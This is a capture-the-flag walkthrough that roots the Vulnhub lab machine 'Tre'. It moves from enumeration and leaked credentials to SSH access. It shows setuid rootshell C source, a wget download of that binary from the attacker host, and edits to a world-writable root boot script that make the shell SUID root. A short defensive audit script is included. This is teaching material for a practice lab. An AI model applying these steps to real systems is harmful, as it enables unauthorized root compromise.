[VLN] Tre

Today we are going to hack the Vulnhub machine called Tre. You can download it from the following link: Tre

Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 12:40 CEST
Nmap scan report for 192.168.112.130
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Tre
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.16 seconds
Let's take a look at Apache (port 80).

sml@m0nique:~$ gobuster dir -u http://192.168.112.130 -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.130
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/18 12:42:09 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/adminer.php (Status: 200)
/cms (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
/mantisbt (Status: 301)
/server-status (Status: 403)
/system (Status: 401)
===============================================================
2020/05/18 12:42:19 Finished
===============================================================
We see the /mantisbt directory, so let's dig a little deeper...

sml@m0nique:~$ gobuster dir -u http://192.168.112.130/mantisbt/ -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.130/mantisbt/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/18 12:47:24 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.txt (Status: 403)
/admin (Status: 301)
/api (Status: 301)
/bug_report.php (Status: 200)
/config (Status: 301)
/css (Status: 301)
/core (Status: 301)
/core.php (Status: 200)
/doc (Status: 301)
/file_download.php (Status: 302)
/fonts (Status: 301)
/images (Status: 301)
/index.php (Status: 302)
/js (Status: 301)
/lang (Status: 301)
/library (Status: 301)
/login.php (Status: 302)
/main_page.php (Status: 302)
/plugins (Status: 301)
/plugin.php (Status: 200)
/scripts (Status: 301)
/search.php (Status: 302)
/signup.php (Status: 200)
/vendor (Status: 301)
/view.php (Status: 200)
/verify.php (Status: 200)
/wiki.php (Status: 200)
===============================================================
2020/05/18 12:47:35 Finished
===============================================================
At http://192.168.112.130/mantisbt/config/a.txt we find credentials that work on http://192.168.112.130/adminer.php. We log in to adminer.php with them, go to "select mantis_user_table" and then "select data". There we find usernames/passwords.

Low Shell


We try to connect over SSH as the user tre with the password we found (Tr3@123456A!).

sml@m0nique:~$ ssh tre@192.168.112.130
tre@192.168.112.130's password: 
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 18 14:39:58 2020 from 192.168.112.128
tre@tre:~$
We're in :) Let's check whether there is anything special we can run with sudo.

tre@tre:/tmp$ sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown
We can run shutdown.... On the other hand, looking at the process list, one process stands out.

tre@tre:~$ ps aux | grep check
root        391  0.0  0.1   6728  3288 ?        Ss   06:38   0:02 /bin/bash /usr/bin/check-system
tre       35106  0.0  0.0   6208   892 pts/1    S+   08:03   0:00 grep check
tre@tre:~$ ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12 04:08 /usr/bin/check-system
It seems /bin/bash /usr/bin/check-system is running as root (PID 391, started at boot), and the file mode -rw----rw- gives us, as "other", read and write access to it. Let's take a look at the file:

tre@tre:~$ cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
echo "Checking...";
sleep 1;
done
It is a simple script: it logs a start message and then loops forever.
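From the defender's side, the condition that makes this script dangerous is easy to test for. The following shell helper is an added example, not part of the original write-up: it flags a root-executed script whose symbolic mode (as printed by ls -l or stat -c %A) grants write access to its group or to everyone, and it assumes GNU coreutils (stat).

```shell
# Added example (not from the original write-up): audit a script that a
# root-owned service runs, the way check-system is run on this box, and flag
# the permission mistake that the escalation relies on. Assumes GNU stat.

# Returns 0 when a symbolic mode string such as "-rw----rw-" (as printed by
# ls -l or stat -c %A) grants write access to the group or to others.
mode_is_shared_writable() {
    mode="$1"
    group_w=$(printf '%s' "$mode" | cut -c6)   # 6th char: group write bit
    other_w=$(printf '%s' "$mode" | cut -c9)   # 9th char: other write bit
    [ "$group_w" = "w" ] || [ "$other_w" = "w" ]
}

# Audits one file that is executed with root privileges.
# Exit status: 0 = ok, 1 = writable by group/others, 2 = not owned by root,
# 3 = file missing. Writability is checked first, so the main finding does
# not depend on who owns the file.
audit_root_run_script() {
    path="$1"
    [ -f "$path" ] || { echo "MISSING: $path"; return 3; }
    perms=$(stat -c '%A' "$path")
    owner=$(stat -c '%U' "$path")
    if mode_is_shared_writable "$perms"; then
        echo "UNSAFE: $path is $perms (writable by group or others)"
        return 1
    fi
    if [ "$owner" != "root" ]; then
        echo "UNSAFE: $path is owned by $owner, not root"
        return 2
    fi
    echo "ok: $path ($perms, owner $owner)"
    return 0
}

# Usage on the box from the write-up: audit the script that the root-owned
# check-system process runs. With mode -rw----rw- it is reported as UNSAFE.
# audit_root_run_script /usr/bin/check-system
```

Running the same audit over every script referenced by a root service (cron entries, systemd ExecStart lines) turns this one-off check into a periodic control.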

Privilege Escalation


Knowing this, we compile a rootshell on our own machine and then download it onto the victim. The rootshell source is the following:

sml@m0nique:/var/www/html$ cat rootshell.c
// gcc -o /tmp/rootshell /tmp/rootshell.c
// chmod u+s /tmp/rootshell

#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

// Only effective when the binary is setuid root: setuid(0)/setgid(0)
// then succeed and the spawned shell runs as root.
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
    return 0;
}
We compile it:

root@m0nique:/var/www/html# gcc -o rootshell rootshell.c
We start a web server to make the "rootshell" binary reachable and download it onto the "victim" machine, in this case to /home/tre/rootshell.

tre@tre:~$ wget http://192.168.112.128/rootshell
--2020-05-18 14:38:37--  http://192.168.112.128/rootshell
Connecting to 192.168.112.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16712 (16K) [application/octet-stream]
Saving to: ‘rootshell’

rootshell                                 100%[=======================>]  16.32K  --.-KB/s    in 0s

2020-05-18 14:38:37 (422 MB/s) - ‘rootshell’ saved [16712/16712]
We edit "/usr/bin/check-system" and add the lines needed for rootshell to be owned by root, have the SUID bit set and be executable by "tre"; that way, when we run it, we will become root...

tre@tre:~$ nano /usr/bin/check-system
It ends up like this:

tre@tre:~$ cat /usr/bin/check-system

DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info
chown root:tre /home/tre/rootshell
chmod +x /home/tre/rootshell
chmod +s /home/tre/rootshell
while :
do
echo "Checking...";
sleep 1;
done
We reboot the machine so that /usr/bin/check-system runs with the changes we made.

tre@tre:~$ sudo shutdown -r now
We connect again and check:

sml@m0nique:~$ ssh tre@192.168.112.130
tre@192.168.112.130's password:
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 18 14:36:31 2020 from 192.168.112.128
tre@tre:~$ ls -l
total 20
-rwsr-sr-x 1 root tre  16712 May 18 14:38 rootshell
It is exactly as we needed it, so...

tre@tre:~$ ./rootshell 
root@tre:~# id
uid=0(root) gid=0(root) 
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(tre)
root@tre:~# whoami
root
root@tre:~# hostname
tre

root.txt



root@tre:~# cd /root
root@tre:/root# ls
root.txt
root@tre:/root# cat root.txt 
{SunCSR_Tr3_Viet_Nam_2020}
root@tre:/root#

End


And with that we are root on the machine :)